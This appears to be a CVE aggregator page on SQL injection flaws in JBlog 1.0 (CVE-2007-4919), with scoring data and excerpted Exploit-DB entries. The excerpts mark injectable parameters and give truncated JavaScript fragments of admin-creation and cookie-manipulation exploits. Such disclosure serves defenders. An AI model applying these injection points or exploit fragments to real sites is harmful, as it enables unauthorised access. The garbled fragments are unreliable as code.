CVE-2007-4919
published 2007-09-17CVE-2007-4919: Multiple SQL injection vulnerabilities in JBlog 1.0 allow (1) remote attackers to execute arbitrary SQL commands via the id parameter to index.php, and allow…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.1th percentile
Multiple SQL injection vulnerabilities in JBlog 1.0 allow (1) remote attackers to execute arbitrary SQL commands via the id parameter to index.php, and allow (2) remote authenticated administrators to execute arbitrary SQL commands via the id parameter to admin/modifpost.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jblog | jblog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
JBlog 1.0 - 'index.php?id' SQL Injection
exploitdb·2007-09-14
CVE-2007-4919 JBlog 1.0 - 'index.php?id' SQL Injection
JBlog 1.0 - 'index.php?id' SQL Injection
---
##################################################
# Script....................................: JBlog ver 1.0
# Script Site...........................: http://www.jmuller.net/jblog/index.php
# Vulnerability........................: Remote SQL injection Exploit
# Access..................................: Remote
# level......................................: Dangerous
# Author..................................: S4mi
# Contact.................................: S4mi[at]LinuxMail.org
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin
Exploit-DB
JBlog 1.0 - Create / Delete Admin Authentication Bypass
exploitdb·2007-07-21
CVE-2007-4919 JBlog 1.0 - Create / Delete Admin Authentication Bypass
JBlog 1.0 - Create / Delete Admin Authentication Bypass
---
[xss Here]&pcomm=com
cookies Manipulation:
The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to :
also we can do this :
'>
or :
'>
This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)
Inject Cookie Xploit By S4mi
function JBlogxpl()
{
document.xploit.action=document.xploit.victim.value;
document.xploit.submit();
}
document.location="javascript: JBlogxpl()"
Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :
-->
JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi
function JBlogxpl() {
if (document.xploit.victim.value=="") {
alert("Please enter target!");
return false;
}
{
xploit.action="http://"+docum
No writeups or analysis indexed.
http://www.securityfocus.com/bid/25669http://www.vupen.com/english/advisories/2007/3178https://exchange.xforce.ibmcloud.com/vulnerabilities/36602https://www.exploit-db.com/exploits/4408http://www.securityfocus.com/bid/25669http://www.vupen.com/english/advisories/2007/3178https://exchange.xforce.ibmcloud.com/vulnerabilities/36602https://www.exploit-db.com/exploits/4408
2007-09-17
Published